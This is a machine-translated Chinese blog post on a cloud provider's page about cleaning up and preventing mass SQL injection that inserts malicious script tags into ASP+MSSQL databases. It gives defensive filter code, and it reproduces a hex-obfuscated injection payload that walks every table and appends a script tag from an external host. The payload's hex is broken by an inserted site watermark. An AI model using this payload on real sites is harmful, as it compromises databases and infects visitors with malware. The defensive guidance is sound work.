asp+mssql2000, the database was injected into the <script src=

Source: Internet
Author: User
Tags filter include insert mssql sql sql injection sql injection attack table name
Over the past few days, the use of asp+mssql design of a lot of Web sites may encounter the SQL database by the horse to insert the experience of the JS; this is not a friend of a site was hackers fooled a, mssql each varchar, text fields are automatically inserted a section of JS code, even if you delete this code , if not resolved from the source, a few minutes later, the JS code will be automatically inserted into the database.

After drifting easy observation, this is probably the program automatically executed, hackers first from search engine Google, Baidu, such as the use of asp+mssql design of the site, and then use Ming such as injection scanning tools, scan the entire site, once found to have SQL injection of the vulnerability or upload a loophole, Hackers by all means, upload their own big horse, such as Haiyang Trojan; then, hackers put this site into his list of chickens, at any time in the database to add their own want to add the JS code, and these codes are often containing a large number of viruses, Trojans, and ultimately to access the controlled site of the user's computer poisoning.

Although, through the SQL Query Analyzer can perform batch substitution, temporarily solve the inserted JS code problems, but do not fundamentally solve the entire site's vulnerabilities, including the program and server security permissions, then hackers or at any time can invade your website database.

In SQL Query Analyzer, you can perform the following code batch substitution JS code:


Update table name set field name =replace (field name, ' <script src=http://c.n%75clear3.com/css/c.js></script> ', ') '

Flymorn carefully inspected the site and found several security issues with the site:

First, the site has a vulnerability upload, although the upload file requires Administrator authentication, but also upload files for file format authentication, but the administrator authentication using cookies, and cookies can be forged, and if the upload of the picture, do not take any judgment on the contents of the document, Then the picture Trojan is also very likely to be uploaded.

Resolution: 1 Delete upload file function (not very practical); 2 Modify upload user verification for session verification, 3 upload the file content for verification, if it is a picture trojan, then delete; you can refer to the following validation code:

"=============== to determine if an uploaded file contains an illegal string start================
Set MyFile = Server. CreateObject ("Scripting.FileSystemObject")
Set MyText = Myfile.opentextfile (Server.MapPath (FilePath), 1) ' reads a text file
Stextall = LCase (Mytext.readall)
Mytext.close
Set MyFile = Nothing
Sstr= "<%|.getfolder|. createfolder|. deletefolder|. createdirectory|. deletedirectory|. Saveas|wscript.shell|script.encode|server.|. Createobject|execute|activexobject|language= "
snostring = Split (SStr, "|")
For i=0 to UBound (snostring)
If InStr (Stextall,snostring (i)) then
Set Filedel = Server. CreateObject ("Scripting.FileSystemObject")
Filedel.deletefile Server.MapPath (FilePath)
Set Filedel = Nothing
Response.Write (' <script>alert (' you uploaded the file has a problem, upload failed! '); History.back ();</script> ")
Response.End
End If
Next
"================= to determine if an uploaded file contains an illegal string end===================

Second, the site has a cookie injection loophole. As a result of programming, in order to consider reducing the cost of the server, all users after landing using cookies to verify that the cookies saved the user ID and NAME, and it is known that cookies are often hacked by hackers, this is one; In addition, some external parameters do not adopt strict Request.Form and Request.QueryString to obtain content, in order to be simple, using the request ("id") such a way.

We know that the ASP request is first from the form, querystring to obtain content, if the two are empty, you want to get content from cookies, we often take into account the design of the Request.Form and Request.QueryString SQL injection, so it is common to filter request.form and request.querystring for SQL injection, but it just forgets to filter the cookies in the way of injection. Let's look at the following SQL statements:

Sql= "SELECT * from table name where id=" &request ("id")

If this ID happens to be a cookie to get the value, then think about it, what a terrible thing ah! The injector can easily forge a false cookie named ID, because the cookie for this ID is assigned to it by the server. This cookie can be forged into a piece of code similar to the following:

DEcLaRe @s vArChAr (4000); SEt @s=cast ( 0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c6
15265207441624c655f637572736f5220635572536f5220466f522073456c456354206 It Talent Network (http://it.ad0.cn) 12e6e416d452c622e6e416d
452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e694www.ad0.cn43d622e6
94420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3
335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f6375
72736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768
696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742
b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275
d29292b27273c2f7469746c653e3c736372697074207372633d687474703a2f2f2536622536622533362532652537
352537332f312e6a733e3c2f7363726970743e27272729206645744368206e6578742046724f6d207441624c655f6
37572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f4
3615465207441624c655f637572736f520d0a as VArChAr (4000)), exec (@s);

Look dizzy. This is the use of hex SQL injection, you can bypass the general IDs validation, as long as the system has SQL injection, the above code will be executed, through the cursor traversal of all the tables and columns in the database and insert the JS code in the column.

Solution: 1 Strictly filtered Request.Form and request.querystring to obtain the content, resolutely do not request ("name") such way to obtain value, usually using cookies saved content, Try not to use in SQL statements query database operations, 2 important user data to use session validation as far as possible, because the session is server-side, the client can not forge data, unless he has your server permissions.

You can filter SQL injection attacks by using the following code to prevent get, post, and cookies injection:

<%
Response.Buffer = True ' Cache page
' Prevent get injection
If request.querystring <> "" Then stopinjection (Request.QueryString)
' Prevent post injection
If request.form <> "" Then stopinjection (Request.Form)
' Prevent cookies from being injected
If request.cookies <> "" Then stopinjection (Request.Cookies)

' Regular child function
Function stopinjection (Values)
Dim regEx
Set regEx = New RegExp
Regex.ignorecase = True
Regex.global = True
Regex.pattern = "' |;| #| ([\s\b+ ()]+ (select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add| set|open|close|use|begin|retun|as|go|exists) [\s\b+]*] "
Dim Sitem, svalue
For each sitem in Values
svalue = Values (Sitem)
If regex.test (svalue) Then
Response.Write "<script Language=javascript>alert (' illegally injected! Your actions have been recorded!! '); History.back ( -1);</script> "
Response.End
End If
Next
Set regEx = Nothing
End Function
%>

Save the above code as a file, such as antisql.asp, and then at the beginning of the database connection file include the file <!--#include file= "antisql.asp"-->, you can implement the entire station to prevent SQL injection attack.

Third, strict filtering of external submission data. Determine the source of the submission page, or reject the submission if it is not the current site. can refer to the following code, although the source URL can be forged, but there is such a judgment, after all, can block those no technical content of malicious submissions:

<% ' judge source, prohibit external submission
Dim server_v1,server_v2
Server_v1=cstr (Request.ServerVariables ("Http_referer"))
Server_v2=cstr (Request.ServerVariables ("SERVER_NAME"))
If server_v1= "" or InStr (SERVER_V1, "Publish page name") <=0 or Mid (Server_v1,8,len (SERVER_V2)) <>server_v2
Response.Write "<script Language=javascript>alert (' source illegal, prohibit external submissions!") ');"
Response.Write "This.location.href= ' Vbscript:history.back () ';</script>"
Response.End
End If%>

Four, do a good job of assigning server permissions. For the permissions of the database, as far as possible to assign the smallest permissions to users, if the SA or administrator to separate the permissions, once the attack fell, it will be a devastating blow. MSSQL 1433 port, float easy to suggest when not to use, preferably close.

In short, the security issue is a comprehensive issue, a small detail, may let your months or years of painstaking effort. We should not only proceed with every detail from the program, but also do a good job of server security, for the users of the virtual host, as well as to prevent the server on the cross-station attack. Details determine success or failure.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.